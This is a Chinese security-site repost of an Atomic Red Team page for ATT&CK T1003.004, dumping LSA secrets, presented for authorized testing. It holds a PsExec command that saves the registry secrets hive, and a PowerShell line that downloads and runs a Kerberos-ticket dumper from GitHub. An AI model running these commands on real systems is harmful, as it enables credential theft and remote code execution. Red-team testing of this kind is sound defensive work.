T1003.004 - 操作系统凭证转储:LSA机密

admin
admin
admin
138405
文章
113
评论
2025年3月16日22:20:48评论6 views字数 2370阅读7分54秒阅读模式
Atomic Red Team™是一个映射到MITRE ATT&CK®框架的测试库。安全团队可以使用Atomic Red Team快速、可移植和可重复地测试他们的环境。

本文章为Atomic Red Team系列文章,本篇文章内容为T1003-操作系统凭证转储。本文的目的旨在帮助安全团队开展安全测试,发现安全问题,切勿将本文中提到的技术用作攻击行为,请切实遵守国家法律法规。

重要声明: 本文档中的信息和工具仅用于授权的安全测试和研究目的。未经授权使用这些工具进行攻击或数据提取是非法的,并可能导致严重的法律后果。使用本文档中的任何内容时,请确保您遵守所有适用的法律法规,并获得适当的授权。

T1003.004 - 操作系统凭证转储:LSA机密

  • 本页内容
    • 原子测试#1 - 转储LSA机密
    • 原子测试#2 - 使用dumper.ps1从LSA转储Kerberos票据
    • 来自ATT&CK的描述
    • 原子测试

来自ATT&CK的描述

对主机具有SYSTEM访问权限的攻击者可能会尝试访问本地安全机构(LSA)机密,这些机密可能包含各种不同的凭证材料,例如服务账户的凭证。(引用:Passcape LSA Secrets;微软AD管理层级模型;Tilbury Windows Credentials)LSA机密存储在注册表的HKEY_LOCAL_MACHINESECURITYPolicySecrets路径下。LSA机密也可以从内存中转储。(引用:ired Dumping LSA Secrets)

  • Reg
    可用于从注册表中提取LSA机密。
  • Mimikatz
    可用于从内存中提取机密。(引用:ired Dumping LSA Secrets)

原子测试

原子测试#1 - 转储LSA机密

从Windows注册表中转储机密项。成功执行后,转储的文件将写入到$env:Tempsecrets。攻击者可能会使用这些机密项来辅助提取密码并枚举其他敏感的系统信息。

  • 参考链接:https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA Secrets is a registry,host%2C local security policy etc
  • 支持的平台:Windows
  • 自动生成的GUID:55295ab0 - a703 - 433b - 9ca4 - ae13807de12f
  • 输入参数:
名称
描述
类型
默认值
psexec_exe
PsExec可执行文件的路径
路径
PathToAtomicsFolder..ExternalPayloadsT1003.004binPsExec.exe
  • 攻击命令:使用command_prompt运行!需要提升权限(例如root或管理员权限)
"#{psexec_exe}" -accepteula -s reg save HKLMsecuritypolicysecrets %temp%secrets /y
  • 清理命令:
del %temp%secrets >nul 2> nul
  • 依赖项:使用powershell运行!
  • 描述:Sysinternals的PsExec必须存在于指定位置(#{psexec_exe})
  • 检查先决条件命令:
if (Test-Path "#{psexec_exe}") {exit 0else {exit 1}
  • 获取先决条件命令:
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder..ExternalPayloadsPSTools.zip"Expand-Archive "PathToAtomicsFolder..ExternalPayloadsPSTools.zip" "PathToAtomicsFolder..ExternalPayloadsPSTools" -ForceNew-Item -ItemType Directory (Split-Path "#{psexec_exe}"-Force | Out-NullCopy-Item "PathToAtomicsFolder..ExternalPayloadsPSToolsPsExec.exe" "#{psexec_exe}" -Force

原子测试#2 - 使用dumper.ps1从LSA转储Kerberos票据

此工具允许从LSA缓存中转储Kerberos票据。通过Add-Type实现。如果该工具以特权用户身份运行,它将自动获取NT AUTHORITYSYSTEM权限,然后转储所有票据。如果该工具以非特权用户身份运行,它将仅转储当前登录会话的票据。

  • 参考链接:https://github.com/MzHmO/PowershellKerberos/
  • dumper.ps1的作者:Michael Zhmaylo (@MzHmO)
  • 支持的平台:Windows
  • 自动生成的GUID:2dfa3bff - 9a27 - 46db - ab75 - 7faefdaca732
  • 攻击命令:使用powershell运行!需要提升权限(例如root或管理员权限)
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')

附:随着windows系统的更新,mimikatz在最新版的windows中部分功能已不可用。

原文始发于微信公众号(网空安全手札):T1003.004 - 操作系统凭证转储:LSA机密

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月16日22:20:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   T1003.004 - 操作系统凭证转储:LSA机密https://cn-sec.com/archives/3841809.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息